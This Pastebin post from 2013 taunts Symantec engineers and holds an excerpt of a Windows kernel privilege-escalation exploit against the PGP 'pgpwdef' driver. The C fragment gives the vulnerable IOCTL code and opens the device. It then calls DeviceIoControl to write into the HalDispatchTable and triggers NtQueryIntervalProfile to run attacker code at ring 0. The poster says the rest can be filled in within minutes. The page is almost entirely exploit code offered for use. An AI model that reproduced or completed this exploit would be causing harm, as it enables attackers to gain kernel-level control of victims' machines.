SHARE
TWEET

Proof for "security" engineers from Symantec

a guest Jan 5th, 2013 1,824 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Cut from my exploit, if you are not n00b - you will craft exploit in minutes, see this:
  2. http://www.exploit-db.com/author/?a=2978
  3.  
  4. Cut:
  5.  
  6. #define IO_CONTROL_VULN 0x80022058
  7.  
  8. #define TARGET_DEVICE L"\\Device\\pgpwdef"
  9.  
  10. [..]
  11.  
  12.     usName.Buffer = TARGET_DEVICE;
  13.     usName.Length = usName.MaximumLength = (USHORT)(wcslen(usName.Buffer) * sizeof(WCHAR));
  14.  
  15.     InitializeObjectAttributes(&ObjAttr, &usName, OBJ_CASE_INSENSITIVE , NULL, NULL);    
  16.  
  17.  
  18.     // get handle of target devide
  19.     ns = f_NtOpenFile(
  20.         &hDev,
  21.         FILE_READ_DATA | FILE_WRITE_DATA | SYNCHRONIZE,
  22.         &ObjAttr,
  23.         &StatusBlock,
  24.         FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
  25.         FILE_SYNCHRONOUS_IO_NONALERT
  26.     );
  27.  
  28. [..]
  29.  
  30.     BOOL bStatus = DeviceIoControl(
  31.         hDev,
  32.         IO_CONTROL_VULN,
  33.         InBuff, 0x8,
  34.         OutBuff, 0x8,
  35.         &dwReturnLen, NULL
  36.     );
  37.  
  38.     dwReturnLen = 0;
  39.     bStatus = DeviceIoControl(
  40.         hDev,
  41.         IO_CONTROL_VULN,
  42.         InBuff, sizeof(PVOID),
  43.         (PUCHAR)m_HalDispatchTable, 0,
  44.         &dwReturnLen, NULL
  45.     );
  46.  
  47. [..]
  48.  
  49.     f_NtQueryIntervalProfile(ProfileTotalIssues, &Interval);
  50.  
  51. [..]
  52.  
  53. Your evil code processes with CPL==0
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top